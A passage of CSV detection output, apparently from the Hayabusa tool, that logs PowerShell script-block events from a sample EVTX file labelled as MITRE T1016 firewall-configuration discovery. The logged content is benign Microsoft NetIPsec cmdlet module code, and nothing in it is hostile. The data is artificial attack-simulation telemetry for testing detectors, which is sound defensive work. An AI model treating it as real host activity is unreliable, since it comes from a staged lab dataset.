$false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach 
($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } 
catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) 
$__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletiza",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tion_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] 
${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvoca",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tionInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated 
